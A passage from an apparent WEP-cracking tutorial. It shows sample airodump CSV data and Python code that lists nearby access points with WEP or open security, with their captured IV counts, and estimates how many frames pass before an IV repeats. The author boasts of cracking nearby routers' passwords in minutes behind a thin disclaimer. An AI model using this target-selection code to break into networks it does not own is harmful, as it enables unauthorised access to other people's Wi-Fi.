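00:1A:2B:3C:4D:5E, 2016-03-01 10:00:00, 2016-03-01 10:09:00, 11,  54, WPA2, CCMP, PSK, -55,  98,    0,   0.  0.  0.  0,   9, OfficeNet, 
00:AA:BB:CC:DD:EE, 2016-03-01 10:00:00, 2016-03-01 10:09:00,  1,  54, OPN ,    , , -70,  40,    0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

def find_weak_aps(csv_text: str) -> list:
    """Return (bssid, essid, channel, privacy, iv_count) for every AP in the
    access-point table whose Privacy column is WEP or OPN (open)."""
    weak = []
    for row in csv.reader(io.StringIO(csv_text), skipinitialspace=True):
        cells = [c.strip() for c in row]
        if not cells:
            continue                      # blank separator line
        if cells[0] == "Station MAC":
            break                         # the client table follows; not needed here
        if cells[0] == "BSSID" or len(cells) < 14:
            continue                      # header or malformed line
        privacy = cells[5]
        if privacy == "OPN" or privacy.startswith("WEP"):
            weak.append((cells[0], cells[13], int(cells[3]), privacy, int(cells[10])))
    return weak

def expected_frames_until_iv_reuse(iv_bits: int = 24) -> int:
    """WEP sends a 24-bit IV in clear with every frame; by the birthday bound the
    mean number of frames before an IV (and so an RC4 keystream) repeats is
    sqrt(pi * 2**iv_bits / 2), about five thousand frames for 24 bits."""
    return round(math.sqrt(math.pi * 2 ** iv_bits / 2))

if __name__ == "__main__":
    for bssid, essid, ch, privacy, ivs in find_weak_aps(SAMPLE_CSV):
        print(f"{bssid} {essid!r} ch={ch} {privacy} IVs captured={ivs}")
    print("mean frames to first IV reuse:", expected_frames_until_iv_reuse())
```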
It may seem like a lot to deal with if you have never done it, but after a few successful
attempts you will get very quick with it. If I am near a WEP encrypted router with a
good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal
activity that you do falls completely on you because, technically, this is just for you
to test the security of your own network.
I hope you all liked it. If you have any queries then ask me.
